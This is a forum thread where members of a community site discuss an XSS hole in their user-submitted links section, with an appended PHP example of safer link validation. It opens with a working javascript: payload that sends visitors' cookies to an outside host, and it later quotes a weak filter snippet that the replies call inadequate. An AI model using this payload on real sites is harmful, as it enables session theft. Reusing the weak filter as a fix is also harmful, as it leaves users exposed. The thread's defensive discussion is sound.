javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie

Hmm, does not look good...


Thanks for alerting us.

I deleted the harmful links.

Currently I have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for the links section?

@mals: Thanks for finding a real security problem.
The geeks shall inherit the properties and methods of object earth.

Links should be validated by admins first.

I agree with theAnswer.
What's to stop people from adding tons of ad-links?

The amount of links you can add depends on your totalscore.

How about this snippet to prevent XSS in links?

// strip one leading "http://", then reject anything that still carries a scheme separator
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
   return htmlDisplayError("only valid links please.");
}


My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.

stop trying to be funny.

There are tons of solutions on the net, but this one looks short and good enough:

http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php

Maybe check out the W3C specification for URLs. I bet you'll find a regex for it.

I think regex is not a good way, because nothing ensures that a valid URL doesn't contain an evil payload. This statement is only theoretical, but true.

Lessons learned: preventing XSS is a hard nut...
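To put the snippet posted earlier in the thread and the point about regexes side by side, here is an added PHP example that is not the forum's own code: weakLinkCheck() reproduces the posted check, while isSafeHttpLink() and renderLink() are hypothetical replacements that validate the parsed scheme and encode on output instead of pattern-matching the URL.

```php
<?php
// Added example (not the forum's code); helper names are hypothetical.
// weakLinkCheck() is the posted snippet: it strips a leading "http://" and
// rejects anything still carrying "://". "javascript:" has no "://", so it
// passes, while every "https://" link is rejected.
function weakLinkCheck(string $url): bool
{
    $url = str_replace("http://", "", $url);
    return strpos($url, "://") === false;
}

// Hardened check: parse, require an allowlisted scheme plus a host, and reject
// control characters/whitespace, which browsers strip before reading the
// scheme (so "java\tscript:" must not slip through). No regex over the URL.
function isSafeHttpLink(string $url): bool
{
    if (strlen($url) > 2048 || preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// A URL that passes validation may still contain '"' or '<', so the output
// side encodes it for the href attribute instead of trusting the check.
function renderLink(string $url, string $label): string
{
    $safeLabel = htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
    if (!isSafeHttpLink($url)) {
        return $safeLabel;                       // drop the link, keep the text
    }
    $safeUrl = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return "<a href=\"$safeUrl\" rel=\"nofollow noopener\">$safeLabel</a>";
}

// Constructed samples, including the javascript: link reported in the thread.
$samples = [
    'http://example.com/page?q=1',
    'https://example.com/',
    'javascript:document.location="http://example.com/?c="+document.cookie',
    "java\tscript:alert(1)",
    'HTTPS://example.com/"><script>',
];
foreach ($samples as $u) {
    printf("weak=%d safe=%d %s\n", weakLinkCheck($u), isSafeHttpLink($u), $u);
    echo renderLink($u, 'link'), "\n";
}
```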